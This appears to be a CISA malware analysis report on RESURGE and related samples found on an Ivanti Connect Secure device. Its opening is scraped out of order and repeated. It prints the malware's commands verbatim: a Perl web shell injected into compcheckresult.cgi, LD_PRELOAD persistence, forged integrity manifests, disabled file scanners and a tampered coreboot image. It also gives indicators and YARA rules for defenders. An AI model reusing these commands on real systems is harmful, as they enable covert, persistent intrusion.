/tmp/data/root/home/etc/manifest/manifest    -Calculates a SHA-256 hash for itself using openssl dgst. The result is appended to the ‘manifest’ file.     sed -i “1i/lib/%s” /tmp/data/root/etc/ld.so.preload    -This inserts itself to the beginning of the ‘ld.so.preload’ file.     touch /tmp/data/root/etc/ld.so.preload    -Updates the timestamp of the ‘ld.so.preload’ file.     sed -i “/ENV{“DSINSTALL_CLEAN”} = $clean;/a \$ENV{“LD_PRELOAD”} = “%s”;” /tmp/data/root/home/perl/DSUpgrade.pm    -Adds a new line after the pattern ENV{“DSINSTALL_CLEAN”} = $clean; in the ‘DSUpgrade.pm’ file. Then sets the environment variable LD_PRELOAD to %s ensuring the library is preloaded when the script is run.     sed -i “/popen(*FH, $prog);/a \$ENV{“LD_PRELOAD”} = “”;” /tmp/data/root/home/perl/DSUpgrade.pm    -Searches for the string “/popen(*FH, $prog);/” in the ‘DSUpgrade.pm’ file and then adds the line $ENV{“LD_PRELOAD”} = “”; after popen(…);. It clears the ‘LD_PRELOAD’ environment variable of all preloaded libraries after the ‘DSUpgrade.pm’ file executes.     sed -i “s/DSUpgrade.pm w{64}/DSUpgrade.pm `/home/bin/openssl dgst -sha256 /tmp/data/root/home/perl/DSUpgrade.pm | cut -d ” ” -f 2` ” /tmp/data/root/home/etc/manifest/manifest    -Searches for the SHA-256 checksum for ‘DSUpgrade.pm’ in the ‘manifest’ file. It uses openssl dgst to calculate the hash of DSUpgrade.pm and replaces the old value with this hash.     sed -i “/main();/I if(CGI::param(“vXm8DtMJG”)){n\ print “Cache-Control: no-cache\n”; n\ print “Content-type: text/html\n\n”; n\ my $a=CGI::param(“vXm8DtMJG”);n\ system(“$a”);n}” /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi    -This inserts Perl code before the main(); function in the file ‘compcheckresult.cgi’. It checks for the parameter “vXm8DtMJG” and, if it exists, runs a command provided by the attacker through the web server     sed -i “s/compcheckresult.cgi w{64}/compcheckresult.cgi `/home/bin/openssl dgst -sha256 “/tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi | cut -d ” ” -f 2` ” /tmp/data/root/home/etc/manifest/manifest    -Similar to the earlier command, it replaces the old ‘compcheckresult.cgi’ with the new SHA-256 hash inside the ‘manifest’ file.     sed -i “s/exit 1/exit 0/g” /tmp/data/root/home/bin/check_integrity.sh    -This command replaces all instances of exit 1 with exit 0 in ‘check_integrity.sh’. This ensures that the script does not exit with an error. sed -i “s/check_integrity.sh w{64}/check_integrity.sh `/home/bin/openssl dgst -sha256 /tmp/data/root/home/bin/check_integrity.sh | cut -d ” ” -f 2`/” /tmp/data/root/home/etc/manifest/manifest    -Similar to the earlier command, it replaces the old ‘check_integrity.sh’ with the new SHA-256 hash inside the ‘manifest’ file.     /home/bin/openssl genrsa -out private.pem 2048    -This generates a 2048-bit RSA private key and saves it in ‘private.pem’.     /home/bin/openssl rsa -in private.pem -out manifest.2 -outform PEM -pubout    -This command extracts the public key from the ‘private.pem’ file and saves it as ‘manifest.2’.     /home/bin/openssl dgst -sha512 -sign private.pem -out manifest.1 /tmp/data/root/home/etc/manifest/manifest    -This signs the manifest file using the private key generating a SHA-512 signature and saving it as ‘manifest.1’.     mv manifest.1 manifest.2 /tmp/data/root/home/etc/manifest/    -Moves the signed manifest files (manifest.1 and manifest.2) into the ‘/tmp/data/root/home/etc/manifest/’ directory     rm -f private.pem’ ./do-install”;    -Deletes the private key file and finally executes the script ‘do-install’. —End Commands 1— —————————————————————————————— —Begin Commands 2— sed -i ‘/\/bin\/cp \/tmp\/data\/root\/\${kerndir}\/coreboot.img \/tmp\/data\/boot\//i\n”    Modifies `/tmp/installer/do-install-coreboot by adding the following commands before the line “/bin/cp /tmp/data/root/${kerndir}/coreboot.img /tmp/data/boot/”     /bin/mkdir /tmp/new_img    Create a new directory ‘/tmp/new_img’.     /bin/dsmain -g    Execute dsmain with the -g argument     /bin/sh /tmp/extract_vmlinux.sh /tmp/data/root/${kerndir}/bzImage > /tmp/new_img/vmlinux”    Executes a shell script ‘extract_vmlinux.sh’ against ‘bzImage’ and saves the output to ‘/tmp/new_img/vmlinux’.     /bin/rm /tmp/extract_vmlinux.sh    Deletes ‘extract_vmlinux.sh’.     output=$(/bin/dsmain strings -t x /tmp/new_img/vmlinux | grep “Linux version “)    Declares the variable $output. Searches for the string ‘Linux Version’ inside the ‘vmlinux’ file while preserving its hex offsets and saves the memory address of the string to $output.     offset=”0x”$(echo $output | awk ‘”‘”‘{print $1}'”‘”‘)    Declares the $offset variable. Extracts the hex offset from $output and prefixes it with 0x.     offset=$((offset + 0xc0))    Adds 0xc0 hex (192 decimal) to the offset current value and saves it in $offset.     key=$(/bin/dsmain xxd -s “$offset” -l 16 -p /tmp/new_img/vmlinux)    Declares the $key variable. It reads 16 bytes from $offset using ‘xxd’. These 16 bytes are then stored as hex in the $key.     /bin/dsmain -d /tmp/data/root/${kerndir}/coreboot.img /tmp/new_img/coreboot.img.1.gz $key    Executes dsmain with the -d argument to decrypt ‘coreboot.img’ using the extracted $key and stores the output as ‘coreboot.img.1.gz’     /bin/mkdir /tmp/coreboot_fs    Makes a new directory ‘/tmp/coreboot_fs’.     /bin/dsmain gunzip /tmp/new_img/coreboot.img.1.gz -c > /tmp/coreboot_fs/coreboot.img.1    Executes dsmain to decompress ‘coreboot.img.1.gz’ into ‘coreboot.img.1’ within the new directory.     cd /tmp/coreboot_fs    Changes into the ‘/tmp/coreboot_fs’ directory.     /bin/dsmain cpio -idvm < coreboot.img.1    Executes dsmain with cpio -idvm to extract the compressed ‘coreboot.img.1’.     /bin/rm coreboot.img.1    Deletes ‘coreboot.img.1’.     cp /bin/dsmain /tmp/coreboot_fs/bin/dsmain    Copies dsmain into the ‘coreboot_fs’ directory.     cp /lib/%s /tmp/coreboot_fs/lib/%s    Copies itself into the ‘coreboot_fs’ directory.     cp /home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg /tmp/coreboot_fs/bin/scanner-0.1-py3.6.egg    Copies the python package ‘scanner-0.1-py3.6.egg’ into the ‘coreboot_fs’ directory.     /bin/sed -i rollback_on_error $? “Extracting Package”    Modifies the boot process by adding the below commands to the file ‘/tmp/coreboot_fs/bin/init’ below the line ‘rollback_on_error $? “Extracting Package”.     /bin/dsmain touch /etc/ld.so.preload    Execute dsmain with touch ‘/etc/ld.so.preload’ to update the access and modified time to the current time.     /bin/dsmain sed -I “1i/lib/%s” /home/root/etc/ld.so.preload    Adds itself to the top of ‘ld.so.preload’.     /bin/cp /bin/dsmain /home/root/bin/dsmain    Copy dsmain into the ‘root/bin’ directory.     /bin/cp /bin/scanner-0.1-py3.6.egg /home/root/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg    Copy ‘scanner-0.1-py3.6.egg’ into a ‘root’ directory.     /bin/cp /lib/%s /home/root/lib/%s    Copy itself into the ‘root/lib’ directory.     “” /tmp/coreboot_fs/bin/init    The boot process files being modified with the above commands.     /bin/dsmain find . -print | /bin/dsmain cpio -o -H newc > /tmp/coreboot_fs/coreboot.img.1    Execute dsmain to repackage the modified ‘coreboot.img’.     /bin/dsmain gzip /tmp/coreboot_fs/coreboot.img.1    Execute dsmain to compress the modified ‘coreboot.img’.     /bin/dsmain -e /tmp/coreboot_fs/coreboot.img.1.gz /tmp/data/root/${kerndir}/coreboot.img $key    Execute dsmain to encrypt the modified ‘coreboot.img’.     rm -rf /tmp/coreboot_fs’    Delete the ‘/tmp/coreboot_fs’ directory. /tmp/installer/do-install-coreboot    The file being modified with the commands. —End Commands 2— —————————————————————————————— —Begin Commands 3— system(“sed -i ‘s/mismatchCount += 1/pass/g’ scripts/scanner.py”);    Replace the ‘mismatchCount += 1’ with ‘pass’ in ‘scanner.py’.     system(“sed -i ‘s/mismatchedFiles.append(file)/ /g’ scripts/scanner.py”);    Replace the ‘mismatchedFiles.append(file)’ with a blank space in ‘scanner.py’.     system(“sed -i ‘s/newFilesCount += 1/pass/g’ scripts/scanner.py”);    Replace ‘newFilesCount += 1’ with ‘pass’ in ‘scanner.py’.     system(“sed -i ‘s/newFilesDetected.append(file)/ /g’ scripts/scanner.py”);    Replace ‘newFilesDetected.append(file)’ with a blank space in ‘scanner.py’.     system(“sed -i ‘s/mismatchCount += 1/pass/g’ scripts/scanner_legacy.py”);    Replace the ‘mismatchCount += 1’ with ‘pass’ in ‘scanner_legacy.py’.     system(“sed -i ‘s/mismatchedFiles.append(file)/ /g’ scripts/scanner_legacy.py”);    Replace the ‘mismatchedFiles.append(file)’ with a blank space in ‘scanner_legacy.py’.     system(“sed -i ‘s/newFilesCount += 1/pass/g’ scripts/scanner_legacy.py”);    Replace ‘newFilesCount += 1’ with ‘pass’ in ‘scanner_legacy.py’.     system(“sed -i ‘s/newFilesDetected.append(file)/ /g’ scripts/scanner_legacy.py”);    Replace ‘newFilesDetected.append(file)’ with a blank space in ‘scanner_legacy.py’. —End Commands 3—

Screenshots

Figure 1. – Checks if the file is loaded by a program called ‘web’ or ‘dsmdm’.

Figure 2. – The decoding function for the proxy.

Figure 3. – The modification to the hooked ‘strncpy’ function.

Figure 4 – Setting up the SSH shell.

Figure 5. – Loading a shared object ‘/tmp/.liblogblock.so’.

Figure 6. – Commands 1.

Figure 7. – Commands 2.

Figure 8. – Commands 3.

 

3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104
Tags
trojan
Details

Name
liblogblock.so

Size
95092 bytes

Type
ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped

MD5
44d09ca5b989e24ff5276d5b5ee1d394

SHA1
5309f9082da0fc24ebf03cb1741fa71335224e5a

SHA256
3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104

SHA512
63ded8e7294ee9a0d4181310d25c348d0d657d35e57740234cb98c9abfd8eb18bb3cd35a28bca3013f3e141b41131b923b39717c7ae864019287c2d85a36ae63

ssdeep
1536:AxlL0im3r1G1+5uIEcfPTLuYzgrbwhpMTQe5pylmpsk76BAwu:Kt1+5unc3TLRujpyRzaw

Entropy
5.376198

Antivirus
No matches found.
YARA Rules

rule CISA_25993211_02 : SPAWNSLOTH trojan compromises_data_integrity{meta:    author = “CISA Code & Media Analysis”    incident = “25993211”    date = “2025-03-04”    last_modified = “20250304_0906”    actor = “n/a”    family = “SPAWN”    capabilities = “compromises-data-integrity”    malware_type = “trojan”    tool_type = “unknown”    description = “Detects SPAWNSLOTH malware samples”    sha256_1 = “3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104″strings:     $s1 = “dslogserver”    $s2 = “g_do_syslog_servers_exist”    $s3 = “_ZN5DSLog4File3addEPKci”    $s4 = “dlsym”    condition:     all of them} 

ssdeep Matches
No matches found.
Relationships

3526af9189…
Contained_Within
52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda

Description
The file, ‘liblogblock.so’, is a 32-bit Linux ELF binary identified as a variant of SPAWNSLOTH malware, a log tampering utility. If the program name is dslogserver, it detaches the shared memory containing the “g_do_syslog_servers_exist” IPC key. Next, it obtains the handle to the symbol “_ZN5DSLog4File3addEPKci” and calls ‘funchook_create’. Funchook is an open source tool that allows intercepting and modifying function calls at run time. The funchook_create calls funchook_alloc, which eventually calls mmap. The dissembled functions were renamed with the names in the opensource for readability. The TA had removed log messages in ‘funchook_create’ to make it difficult to identify the open source tool that was used.
Screenshots

Figure 9. – The hooking functions used against ‘dslogserver’.

b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d
Tags
trojan
Details

Name
dsmain

Size
5102976 bytes

Type
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.16, with debug_info, not stripped

MD5
6e01ef1367ea81994578526b3bd331d6

SHA1
09eb513f284771461bcdc16ee28d31ce8bbe74e0

SHA256
b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d

SHA512
ecbda91571b0429be42017dddd2cb687ce696dd601cd02f2502119b8b732376cee2097069ca35ba0089387d58213c6140c2caf8e6c2e05733d21c309b51e2b9b

ssdeep
49152:4ZLtRJ8ryYwd5OP5nz1kHKf26xZVKtom+YvFM4tAcRrhOBDKx76a:4ptVbQ5nz2SZstogttAcRrhOBu6a

Entropy
6.020899

Antivirus

ESET
Linux/Agent.AHD trojan

YARA Rules
No matches found.
ssdeep Matches
No matches found.
Description
The file ‘dsmain’ is a 64-bit Linux ELF which contains the open source script ‘extract_vmlinux.sh’ and the open source tool ‘BusyBox’. The file takes three arguments (-e, -d, -g). The -e argument is used to encrypt a file with an Advance Encryption Standard (AES) key. The -d argument is used to decrypt a file using an AES key. The -g argument is used to invoke the script ‘extract_vmlinux.sh’ where it is written to /tmp/extract_vmlinux.sh and is used to extract the uncompressed vmlinux from a kernel image. The TA extracts vmlinux to analyze the kernel’s code, identify vulnerabilities and potentially exploit the system. BusyBox is an open-source project tool from a collection of Unix utilities that are widely used by embedded devices and industrial control systems (ICS). When a TA accesses a device running BusyBox, the TA can execute a series of BusyBox commands to perform various functions such as downloading and executing malicious payloads on the compromised device. The file ‘dsmain’ uses specified applets from BusyBox. –Begin Applets Used From BusyBox– bzcat bzip2 cat cpio find gunzip gzip lzop sed sh strings tail tar touch tr unlzma unlzop unxz xxd xz –End Applets Used From BusyBox–

Relationship Summary

52bbc44eb4…
Contains
3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104

3526af9189…
Contained_Within
52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

1-888-282-0870
CISA Service Desk (UNCLASS)
CISA SIPR (SIPRNET)
CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.
Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.
Can I submit malware to CISA? Malware samples can be submitted via the methods below:

Web: https://www.cisa.gov/resources-tools/services/malware-next-generation-analysis
For larger files (over 100MB), please reach out to CISA for instructions.

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov. 

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR–Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA analyzed three files obtained from a critical infrastructure’s Ivanti Connect Secure device after threat actors exploited Ivanti CVE-2025-0282 for initial access. One file—that CISA is calling RESURGE—has functionality similar to SPAWNCHIMERA in how it creates a Secure Shell (SSH) tunnel for command and control (C2). RESURGE also contains a series of commands that can modify files, manipulate integrity checks, and create a web shell that is copied to the running Ivanti boot disk. 

The second file is a variant of SPAWNSLOTH, that was contained within the RESURGE sample. The file tampers with the Ivanti device logs. The third file is a custom embedded binary that contains an open-source shell script and a subset of applets from the open-source tool BusyBox. The open-source shell script allows for ability to extract an uncompressed kernel image (vmlinux) from a compromised kernel image. BusyBox enables threat actors to perform various functions such as download and execute payloads on compromised devices. 

For information on CVE-2025-0282, see CISA Alert CISA Releases Malware Analysis Report on RESURGE Malware Associated with Ivanti Connect Secure.

Download the PDF version of this report:

AR25-087A MAR-25993211-r1.v1 Ivanti Connect Secure (RESURGE)
(PDF, 1.33 MB
)

For a downloadable copy of IOCs associated with this MAR, see:

AR25-087A STIX JSON
(JSON, 52.23 KB
)

 
Submitted Files (2)

52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda (libdsupgrade.so)
b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d (dsmain)

Additional Files (1)

3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104 (liblogblock.so)

Findings

52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda
Tags

backdoor dropper rootkit

Details
Name libdsupgrade.so
Size 1414480 bytes
Type ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.16, stripped
MD5 cfb263a731d51ff489168bbca0d3bd2f
SHA1 87bcbbcb878aeee6ad4463464745770e95c6a937
SHA256 52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda
SHA512 3d12fdb707c188eb2e94cbf2dd42a50cfe343128652bab9245a54b887e35bc32c6a88c8faa5001a045df3991b387fcd6a27719ecbf84f6ce893163b040c2e0dd
ssdeep 24576:h6j7Ed+iowSCstJtmOKSbqUmtzYxs7X0ToN8fp/AQClBka:h4wSC0JtmpntzYMU2
Entropy 6.171523
Antivirus
ESET a variant of Linux/SpawnSnail.A trojan
YARA Rules
  • rule CISA_25993211_01 : RESURGE backdoor dropper rootkit bootkit 
    {
    meta:
        author = “CISA Code & Media Analysis”
        incident = “25993211”
        date = “2025-03-03”
        last_modified = “20250303_1446”
        actor = “n/a”
        family = “SPAWN”
        capabilities = “n/a”
        malware_type = “backdoor dropper rootkit bootkit”
        tool_type = “unknown”
        description = “Detects RESURGE malware samples”
        sha256_1 = “52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda”
    strings:
        $s1 = “snprintf”
        $s2 = “CGI::param”
        $s3 = “coreboot.img” 
        $s4 = “scanner.py” 
        $s5 = { 6C 6F 67 73 }
        $s6 = “accept”
        $s7 = “strncpy”
        $s8 = “dsmdm” 
        $s9 = “funchook_create” 
        $s10 = { 20 83 B8 ED }
    condition:
        all of them
    }
     
ssdeep Matches

No matches found.

Relationships
52bbc44eb4… Contains 3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104
Description

The file ‘libdsupgrade.so’ is a malicious 32-bit Linux Shared Object file that was extracted from an Ivanti Connect Secure device version 22.7.4.30859. The file contains capabilities of a rootkit, dropper, backdoor, bootkit, proxy, and tunneler. The file shares similar functionality to SPAWNCHIMERA malware however, this file contains a series of commands that modify files, manipulates integrity checks, and creates a web shell that is copied to the running Ivanti boot disk. CISA is calling this variant RESURGE. 

The similarities to SPAWNCHIMERA are as follows. RESURGE checks if the file is loaded by a program called ‘web’ or ‘dsmdm’ (Figure 1). 

If the ‘web’ program is called, it hooks accept and strncpy. It contains an embedded private key, which is Exclusive Or (XOR) encrypted, so the Threat Actor (TA) can connect to it with their public key. This proxy does not use encryption, it uses the decoding function (Figure 2). It uses tunneling to look for an Internet Protocol (IP) and data and decodes the data received which will then be funneled through the proxy. The hooked strncpy is modified to limit the copied data to 256 bytes. This is achieved by checking the web program is running within a specified address range, the bytes are not larger than 256, and the bytes do not begin with a specific byte pattern (Figure 3). The TA connects to the tunneler, which can also communicate with the file ‘me/runtime/tmp/.logsrv’. When it receives traffic it will funnel to the file, where the TA can then communicate with the system via a secure shell. 

If the ‘dsmdm’ program is called, it creates a thread for a secure shell via SSH to the system. It doesn’t bind to a port but rather binds to a file called ‘me/runtime/tmp/.logsrv’ and listens for connections, giving the TA a secure socket shell to the system (Figure 4). In order for the TA to access the shell, they need to access the file. Another thread is also created to drop the file ‘liblogblock.so’ to the ‘/tmp’ directory. It creates a handle to the ‘proc’ folder, enumerating through it looking for the ‘dslogserver’ process. It interacts with ‘dslogserver’ through shared memory to read from or write to the memory it is using. It checks whether the dslogserver is up. If not, it sleeps for 10 seconds and then checks again. This behavior continues in a loop until the server is detected, at which time it will try to load a shared object file called ‘/tmp/.liblogblock.so’ (Figure 5). 

RESURGE contains a series of commands that have been broken down and perform the following functionality: 

Commands 1: Inserts itself into ‘ld.so.preload’, sets up a web shell for remote command execution within the ‘compcheckresult.cgi’ file, fakes integrity checks, and generates keys against the modified files to sign the manifest file so they appear legitimate (Figure 6). 

Commands 2: Decrypts, modifies, and re-encrypts coreboot Random Access Memory (RAM) disk (Figure 7). 

Commands 3: Uses system() to execute several sed commands. These commands modify the contents of two Python files (‘scanner.py’ and ‘scanner_legacy.py’) by searching for particular lines and replacing them with new one which, if successful, will result in the scanning scripts no longer keeping track of mismatches or new files (Figure 8). 

—Begin Commands 1— 
/bin/sed -i ‘/echo_console “Saving package”/i 
   -Searches for the string echo_console “Saving package” and enters the following commands before it: 

cp /lib/%s /tmp/data/root/lib 
   -Copies itself to ‘/tmp/data/root/lib’. 
    
cp /home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg /tmp/data/root/home/venv3/lib/python3.6/site-packages/scanner-0.1- py3.6.egg 
   -Copies a Python package ‘scanner-0.1-py3.6.egg’ to /tmp/data/root/home/venv3/lib/…. 

echo “/lib/%s “`/home/bin/openssl dgst -sha256 /lib/%s|cut -d ” “-f 2` b” >> /tmp/data/root/home/etc/manifest/manifest 
   -Calculates a SHA-256 hash for itself using openssl dgst. The result is appended to the ‘manifest’ file. 
    
sed -i “1i/lib/%s” /tmp/data/root/etc/ld.so.preload 
   -This inserts itself to the beginning of the ‘ld.so.preload’ file. 
    
touch /tmp/data/root/etc/ld.so.preload 
   -Updates the timestamp of the ‘ld.so.preload’ file. 
    
sed -i “/ENV{“DSINSTALL_CLEAN”} = $clean;/a \$ENV{“LD_PRELOAD”} = “%s”;” /tmp/data/root/home/perl/DSUpgrade.pm 
   -Adds a new line after the pattern ENV{“DSINSTALL_CLEAN”} = $clean; in the ‘DSUpgrade.pm’ file. Then sets the environment variable LD_PRELOAD to %s ensuring the library is preloaded when the script is run. 
    
sed -i “/popen(*FH, $prog);/a \$ENV{“LD_PRELOAD”} = “”;” /tmp/data/root/home/perl/DSUpgrade.pm 
   -Searches for the string “/popen(*FH, $prog);/” in the ‘DSUpgrade.pm’ file and then adds the line $ENV{“LD_PRELOAD”} = “”; after popen(…);. It clears the ‘LD_PRELOAD’ environment variable of all preloaded libraries after the ‘DSUpgrade.pm’ file executes. 
    
sed -i “s/DSUpgrade.pm w{64}/DSUpgrade.pm `/home/bin/openssl dgst -sha256 /tmp/data/root/home/perl/DSUpgrade.pm | cut -d ” ” -f 2` ” /tmp/data/root/home/etc/manifest/manifest 
   -Searches for the SHA-256 checksum for ‘DSUpgrade.pm’ in the ‘manifest’ file. It uses openssl dgst to calculate the hash of DSUpgrade.pm and replaces the old value with this hash. 
    
sed -i “/main();/I if(CGI::param(“vXm8DtMJG”)){n\ print “Cache-Control: no-cache\n”; n\ print “Content-type: text/html\n\n”; n\ my $a=CGI::param(“vXm8DtMJG”);n\ system(“$a”);n}” /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi 
   -This inserts Perl code before the main(); function in the file ‘compcheckresult.cgi’. It checks for the parameter “vXm8DtMJG” and, if it exists, runs a command provided by the attacker through the web server 
    
sed -i “s/compcheckresult.cgi w{64}/compcheckresult.cgi `/home/bin/openssl dgst -sha256 “/tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi | cut -d ” ” -f 2` ” /tmp/data/root/home/etc/manifest/manifest 
   -Similar to the earlier command, it replaces the old ‘compcheckresult.cgi’ with the new SHA-256 hash inside the ‘manifest’ file. 
    
sed -i “s/exit 1/exit 0/g” /tmp/data/root/home/bin/check_integrity.sh 
   -This command replaces all instances of exit 1 with exit 0 in ‘check_integrity.sh’. This ensures that the script does not exit with an error. 

sed -i “s/check_integrity.sh w{64}/check_integrity.sh `/home/bin/openssl dgst -sha256 /tmp/data/root/home/bin/check_integrity.sh | cut -d ” ” -f 2`/” /tmp/data/root/home/etc/manifest/manifest 
   -Similar to the earlier command, it replaces the old ‘check_integrity.sh’ with the new SHA-256 hash inside the ‘manifest’ file. 
    
/home/bin/openssl genrsa -out private.pem 2048 
   -This generates a 2048-bit RSA private key and saves it in ‘private.pem’. 
    
/home/bin/openssl rsa -in private.pem -out manifest.2 -outform PEM -pubout 
   -This command extracts the public key from the ‘private.pem’ file and saves it as ‘manifest.2’. 
    
/home/bin/openssl dgst -sha512 -sign private.pem -out manifest.1 /tmp/data/root/home/etc/manifest/manifest 
   -This signs the manifest file using the private key generating a SHA-512 signature and saving it as ‘manifest.1’. 
    
mv manifest.1 manifest.2 /tmp/data/root/home/etc/manifest/ 
   -Moves the signed manifest files (manifest.1 and manifest.2) into the ‘/tmp/data/root/home/etc/manifest/’ directory 
    
rm -f private.pem’ ./do-install”; 
   -Deletes the private key file and finally executes the script ‘do-install’. 
—End Commands 1— 
—————————————————————————————— 
—Begin Commands 2— 
sed -i ‘/\/bin\/cp \/tmp\/data\/root\/\${kerndir}\/coreboot.img \/tmp\/data\/boot\//i\n” 
   Modifies `/tmp/installer/do-install-coreboot by adding the following commands before the line “/bin/cp /tmp/data/root/${kerndir}/coreboot.img /tmp/data/boot/” 
    
/bin/mkdir /tmp/new_img 
   Create a new directory ‘/tmp/new_img’. 
    
/bin/dsmain -g 
   Execute dsmain with the -g argument 
    
/bin/sh /tmp/extract_vmlinux.sh /tmp/data/root/${kerndir}/bzImage > /tmp/new_img/vmlinux” 
   Executes a shell script ‘extract_vmlinux.sh’ against ‘bzImage’ and saves the output to ‘/tmp/new_img/vmlinux’. 
    
/bin/rm /tmp/extract_vmlinux.sh 
   Deletes ‘extract_vmlinux.sh’. 
    
output=$(/bin/dsmain strings -t x /tmp/new_img/vmlinux | grep “Linux version “) 
   Declares the variable $output. Searches for the string ‘Linux Version’ inside the ‘vmlinux’ file while preserving its hex offsets and saves the memory address of the string to $output. 
    
offset=”0x”$(echo $output | awk ‘”‘”‘{print $1}'”‘”‘) 
   Declares the $offset variable. Extracts the hex offset from $output and prefixes it with 0x. 
    
offset=$((offset + 0xc0)) 
   Adds 0xc0 hex (192 decimal) to the offset current value and saves it in $offset. 
    
key=$(/bin/dsmain xxd -s “$offset” -l 16 -p /tmp/new_img/vmlinux) 
   Declares the $key variable. It reads 16 bytes from $offset using ‘xxd’. These 16 bytes are then stored as hex in the $key. 
    
/bin/dsmain -d /tmp/data/root/${kerndir}/coreboot.img /tmp/new_img/coreboot.img.1.gz $key 
   Executes dsmain with the -d argument to decrypt ‘coreboot.img’ using the extracted $key and stores the output as ‘coreboot.img.1.gz’ 
    
/bin/mkdir /tmp/coreboot_fs 
   Makes a new directory ‘/tmp/coreboot_fs’. 
    
/bin/dsmain gunzip /tmp/new_img/coreboot.img.1.gz -c > /tmp/coreboot_fs/coreboot.img.1 
   Executes dsmain to decompress ‘coreboot.img.1.gz’ into ‘coreboot.img.1’ within the new directory. 
    
cd /tmp/coreboot_fs 
   Changes into the ‘/tmp/coreboot_fs’ directory. 
    
/bin/dsmain cpio -idvm < coreboot.img.1 
   Executes dsmain with cpio -idvm to extract the compressed ‘coreboot.img.1’. 
    
/bin/rm coreboot.img.1 
   Deletes ‘coreboot.img.1’. 
    
cp /bin/dsmain /tmp/coreboot_fs/bin/dsmain 
   Copies dsmain into the ‘coreboot_fs’ directory. 
    
cp /lib/%s /tmp/coreboot_fs/lib/%s 
   Copies itself into the ‘coreboot_fs’ directory. 
    
cp /home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg /tmp/coreboot_fs/bin/scanner-0.1-py3.6.egg 
   Copies the python package ‘scanner-0.1-py3.6.egg’ into the ‘coreboot_fs’ directory. 
    
/bin/sed -i rollback_on_error $? “Extracting Package” 
   Modifies the boot process by adding the below commands to the file ‘/tmp/coreboot_fs/bin/init’ below the line ‘rollback_on_error $? “Extracting Package”. 
    
/bin/dsmain touch /etc/ld.so.preload 
   Execute dsmain with touch ‘/etc/ld.so.preload’ to update the access and modified time to the current time. 
    
/bin/dsmain sed -I “1i/lib/%s” /home/root/etc/ld.so.preload 
   Adds itself to the top of ‘ld.so.preload’. 
    
/bin/cp /bin/dsmain /home/root/bin/dsmain 
   Copy dsmain into the ‘root/bin’ directory. 
    
/bin/cp /bin/scanner-0.1-py3.6.egg /home/root/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg 
